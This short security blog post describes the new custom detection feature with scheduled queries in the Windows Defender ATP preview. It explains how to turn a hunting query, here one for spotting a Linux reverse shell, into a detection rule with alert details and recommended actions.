In the September release one of our most wanted features was added to WD ATP preview, Custom detection with scheduled queries.
This means that you can now develop your own hunting queries and run them every day automatically.
For this example we created a query to find a simple reverse shell from a Linux machine which runs Ziften.
Next step is to create a detection rule for the Query
You can add Alert Title, Severity, Category, Description and Recommended actions.
It will be good if you add some details in the recommended actions if someone else will take action on the alert, or at least add a pointer to where they can find further information on requred actions. (Information sharing is important).
It’s possible to change this infomation later on.
On the Detection Rule page you can see the alerts and other information regards the detection rule.
All the rules will be listed at the left side in the hunting section.
For further infomation about the new preview features please go to this url:
Happy hunting!
/Sec-Labs